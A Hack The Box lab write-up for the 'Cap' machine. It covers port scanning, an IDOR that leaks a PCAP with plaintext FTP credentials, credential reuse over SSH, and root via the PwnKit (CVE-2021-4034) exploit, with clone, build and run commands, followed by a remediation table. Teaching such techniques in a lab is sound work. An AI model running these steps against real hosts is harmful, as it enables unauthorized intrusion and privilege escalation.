HTB Cap: IDOR to PCAP Credential Leak and PwnKit Privilege Escalation
Introduction
Cap is an Easy Linux machine that chains three realistic vulnerabilities: IDOR on a network capture endpoint leading to credential leak, credential reuse across FTP and SSH, and privilege escalation via CVE-2021-4034 (PwnKit).
Attack Overview
Nmap → Open FTP/SSH/HTTP
↓
Web fuzzing → /capture redirects to /data/1
↓
IDOR: /data/0 → PCAP download
↓
Wireshark: nathan:Buck3tH4TF0RM3!
↓
FTP login → user.txt
↓
SSH login as nathan
↓
LinPEAS → pkexec SUID (v0.105)
↓
CVE-2021-4034 → rootReconnaissance
Nmap scan:
nmap -sC -sV -oN nmap_report.txt 10.129.32.185| Port | Service | Version |
|---|---|---|
| 21 | FTP | vsftpd 3.0.3 |
| 22 | SSH | OpenSSH 8.2p1 |
| 80 | HTTP | Gunicorn (Security Dashboard) |
FTP anonymous login is denied. The web application is a Python backend (Gunicorn, likely Flask).
Web Enumeration
Directory fuzzing reveals interesting paths:
| Path | Status | Notes |
|---|---|---|
| /ip | 200 | Network interface info |
| /netstat | 200 | Active connections |
| /data | 302 | Redirects to / |
| /capture | 302 | Redirects to /data/1 |
The /capture endpoint redirects to /data/1. The integer ID is immediately suspicious.
IDOR – Credential Leak via PCAP
Navigating to /data/1 shows a download link for a .pcap network capture file. The dashboard reveals the logged-in username: nathan.
This is an Insecure Direct Object Reference (IDOR): the application uses a user-supplied integer to directly reference a stored object without verifying ownership.
Change the ID to 0:
http://cap.htb/data/0Download the PCAP and open it in Wireshark. Filtering for FTP traffic reveals a plaintext authentication session:
USER nathan
PASS Buck3tH4TF0RM3!Credentials obtained: nathan:Buck3tH4TF0RM3!
Foothold – FTP + SSH
FTP login:
ftp 10.129.32.185
# user: nathan
# pass: Buck3tH4TF0RM3!
ftp> get user.txtThe same credentials work over SSH:
ssh nathan@10.129.32.185
# password: Buck3tH4TF0RM3!User flag:
[redacted]Privilege Escalation – CVE-2021-4034 (PwnKit)
Checking sudo -l shows no sudo rights. LinPEAS reveals:
Pkexec binary found at: /usr/bin/pkexec
-rwsr-xr-x 1 root root 31032 Aug 16 2019 /usr/bin/pkexec
pkexec version 0.105pkexec version 0.105 is vulnerable to CVE-2021-4034 (PwnKit). This vulnerability allows any local user to escalate to root through a memory corruption bug in pkexec’s argument handling.
Exploitation:
git clone https://github.com/berdav/CVE-2021-4034
cd CVE-2021-4034-main
make
./cve-2021-4034Root flag:
[redacted]Key Takeaways
| Vulnerability | Root Cause | Remediation |
|---|---|---|
| IDOR on PCAP endpoint | User-supplied integer directly references object without ownership check | Validate object ownership before serving resources; use indirect references |
| Plaintext credentials in PCAP | FTP authentication sent unencrypted | Use SFTP or FTPS; avoid plaintext protocols |
| Credential reuse across FTP and SSH | Same password for multiple services | Use unique credentials per service |
| CVE-2021-4034 (PwnKit) | pkexec SUID binary with argument parsing vulnerability | Update polkit to patched version (post-Jan 2022); remove SUID from pkexec if not needed |
Resources
- Nmap — Port scanning and service detection
- ffuf — Directory fuzzing
- Wireshark — PCAP analysis
- LinPEAS — Local privilege escalation enumeration
- CVE-2021-4034 PoC — PwnKit exploit